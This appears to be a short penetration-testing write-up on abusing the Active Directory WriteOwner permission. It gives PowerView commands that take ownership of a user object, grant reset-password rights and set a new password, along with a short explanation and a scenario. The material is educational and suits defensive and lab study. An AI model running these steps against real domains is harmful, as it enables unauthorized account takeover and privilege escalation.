WriteOwner Exploit

Refer to: https://www.youtube.com/watch?v=ob9SgtFm6_g&t=1431s

What is the WriteOwner Permission For?

Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). The WriteOwner permission can be abused by an attacker to change the object owner to an attacker controlled user and take over the object

Scenario:

You have managed to compromise an account belonging to Tom. Running Bloodhound identified that there were was no direct access from Tom's account to Domain Admins. Checking Outband Object Control reveled an attack path from Tom to the Backup Admin group through Claire.

Outband Control Option

Attack Path Identified

Attack Path

1. Tom has WriteOwner permissions over Claire

2. Claire has GenericWrite permissions over the group BACKUP_ADMINS

3. BACKUP_ADMINS sounds interesting :)

In order to easily take advantage of the WriteOwner and GenericWrite permissions, we’ll use PowerView, which is part of the PowerSploit collection.

### Set tom as the owner of claire’s ACL 
Set-DomainObjectOwner -identity claire -OwnerIdentity tom 

### Give tom permissions to change passwords on that ACL
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword 

### Create powershell credential and change credentials. 
### NOTE!! IN A REAL PENTEST YOU WOULD ENABLE REVERSIBLE ENCRYPTION OR MAKE USER KERBEROSTABLE OR SOMETHING ELSE AND NOT CHANGE THE PASSWORD IN A PRODUCTION ENVIRONMENT
$cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred

Screenshot for reference

Success. You can now login as Claire using the new password: qwer1234QWER!@#$